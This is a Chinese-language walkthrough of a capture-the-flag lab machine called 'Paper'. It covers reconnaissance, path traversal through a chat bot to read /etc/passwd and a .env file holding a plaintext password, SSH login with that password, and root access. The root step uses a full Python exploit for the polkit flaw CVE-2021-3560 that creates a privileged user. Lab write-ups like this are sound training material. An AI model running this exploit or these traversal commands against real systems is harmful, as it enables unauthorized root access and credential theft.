开始时间:
2022年4月5日10点
msf6 > db_nmap -T4 -A -v 10.10.11.143
扫描到开放端口:
22
80
443
nmap -sV -A 10.10.11.143
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
打开网页后,发现,没有有用的价值
打开F12,看看有啥好东西
在hosts里加上(作用目前不知道。。不加就不能访问)
10.10.11.143 office.paper
打开后发现
在页面底部发现与wordpress有关
使用wpscan扫描一下
wpscan --url http://office.paper/
WordPress 版本为5.2.3
百度一下有没有可利用的东西
找到了这个Exploit
http://office.paper/?static=1&order=asc
返回404
删掉&order=asc再次尝试
http://office.paper/?static=1
看到一个文章
看看内容。。。
发现这么一个内容
# Secret Registration URL of new Employee chat system
http://chat.office.paper/register/8qozr226AhkCHZdyY
再次hosts里,
加上chat.office.paper
访问地址
http://chat.office.paper
地址改成
http://chat.office.paper/register
404了。。
直接访问原地址
http://chat.office.paper/register/8qozr226AhkCHZdyY
发现注册页面。。注册一个呗
随便写一下
马上就来了个消息
bot? 什么玩意
这里提到有人在该频道中添加了一个新的机器人,只需要输入recyclops help机器人就会告诉你可以做什么
漏洞利用
目前可知的信息
- 我们有了一个可以互动的机器人 recyclops
- 机器人可以帮我们获得文件
- 我们无法在频道内发言
OK,到这里思路就很清晰了,我们去找机器人私聊
这里要求他读取test.txt文件
回复文件/home/dwight/sales/test.txt文件不存在,尝试一下是否可以路径穿越
这边构造了一下路径,成功获得/etc/passwd文件
12:49 AM
recyclops file ../../../../etc/passwd
Bot
12:49 AM
<!=====Contents of file ../../../../etc/passwd=====>
root❌0:0:root:/root:/bin/bash
bin❌1:1:bin:/bin:/sbin/nologin
daemon❌2:2:daemon:/sbin:/sbin/nologin
adm❌3:4:adm:/var/adm:/sbin/nologin
lp❌4:7:lp:/var/spool/lpd:/sbin/nologin
sync❌5:0:sync:/sbin:/bin/sync
shutdown❌6:0:shutdown:/sbin:/sbin/shutdown
halt❌7:0:halt:/sbin:/sbin/halt
mail❌8:12:mail:/var/spool/mail:/sbin/nologin
operator❌11:0:operator:/root:/sbin/nologin
games❌12💯games:/usr/games:/sbin/nologin
ftp❌14:50:FTP User:/var/ftp:/sbin/nologin
nobody❌65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus❌81:81:System message bus:/:/sbin/nologin
systemd-coredump❌999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve❌193:193:systemd Resolver:/:/sbin/nologin
tss❌59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd❌998:996:User for polkitd:/:/sbin/nologin
geoclue❌997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
rtkit❌172:172:RealtimeKit:/proc:/sbin/nologin
qemu❌107:107:qemu user:/:/sbin/nologin
apache❌48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws❌996:993:User for cockpit-ws:/:/sbin/nologin
pulse❌171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd❌113:113:usbmuxd user:/:/sbin/nologin
unbound❌995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc❌32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster❌994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony❌993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt❌992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth❌991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq❌985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd❌75:75:radvd user:/:/sbin/nologin
clevis❌984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus❌66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd❌983:981:User for sssd:/:/sbin/nologin
colord❌982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser❌29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot❌981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire❌980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm❌42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup❌979:977::/run/gnome-initial-setup/:/sbin/nologin
insights❌978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi❌70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump❌72:72::/:/sbin/nologin
mysql❌27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx❌977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod❌976:974:mongod:/var/lib/mongo:/bin/false
rocketchat❌1001:1001::/home/rocketchat:/bin/bash
dwight❌1004:1004::/home/dwight:/bin/bash
<!=====Contents of file ../../../../etc/passwd=====>
recyclops list
查看当前有什么文件,不知道为什么,会重复一遍
recyclops list ../
查看上级文件里有什么
好像看到个user.txt
访问被拒绝。。
按照大佬提示,hubot里可能有东西
进去看看
在hubot目录中,有一个.env文件,咱们查看一下这个文件
里面的USER和PASSWORD引人注目
<!=====Contents of file ../hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../hubot/.env=====>
想到之前nmap扫描到22端口开放的ssh
拿着密码试一下
成功了
ssh [email protected]
密码
Queenofblad3s!23
拿到user的flag
[dwight@paper ~]$ cat user.txt
2407edf932ab536de2617761049efcc5
=================================================================
截个全图
=================================================================
ps aux
看看有什么进程
大佬提示 polkitd 有可利用漏洞
msf扫描知道
CVE-2021-3560
可以利用
msf6 > use exploit/linux/local/polkit_dbus_auth_bypass 
f= open("CVE-2021-3560.py","w+")
利用python3 创建个py文件
将以下python代码写进CVE-2021-3560.py里
vim CVE-2021-3560.py
按i 进入插入模式,这里直接复制
完成后按esc
再输入:wq 保存退出
=================================================================
importos
importsys
importtime
importsubprocess
importrandom
importpwd
print ("**************")
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
print("Exploit code written by Ahmad Almorabea @almorabea")
print("Original exploit author: Kevin Backhouse ")
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
print ("**************")
print("[+] Starting the Exploit ")
time.sleep(3)
check = True
counter = 0
whilecheck:
counter = counter +1
process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1'])
try:
#print('1 - Running in process', process.pid)
Random = random.uniform(0.006,0.009)
process.wait(timeout=Random)
process.kill()
exceptsubprocess.TimeoutExpired:
#print('Timed out - killing', process.pid)
process.kill()
user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
ifuser.find("uid") != -1:
print("[+] User Created with the name of ahmed")
print("[+] Timed out at: "+str(Random))
check =False
break
ifcounter > 2000:
print("[-] Couldn't add the user, try again it may work")
sys.exit(0)
foriinrange(200):
#print(i)
uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid)
#In case you need to put a password un-comment the code below and put your password after string:yourpassword'
password = "string:"
#res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
#password = f"string:{res.rstrip()}"
process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye'])
try:
#print('1 - Running in process', process.pid)
Random = random.uniform(0.006,0.009)
process.wait(timeout=Random)
process.kill()
exceptsubprocess.TimeoutExpired:
#print('Timed out - killing', process.pid)
process.kill()
print("[+] Timed out at: " + str(Random))
print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")
p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)
=================================================================
执行py文件
python3 CVE-2021-3560.py 
执行完成后,拿到root权限
whoami&&id
=================================================================
在root文件夹看到root.txt
[root@paper ~]# cat root.txt
提交flag,成功
完成时间:
2022年4月5日18:56:05
留有问题
msf use post/multi/gather/peass 无法直接使用,缺少模块
在github下载后就可以用了
大佬建议:
1. 首先你得用msf获得一个shell先 , 然后在按ctrl+z返回再用回里面的那个指令,
run post/multi/recon/local_exploit_suggester
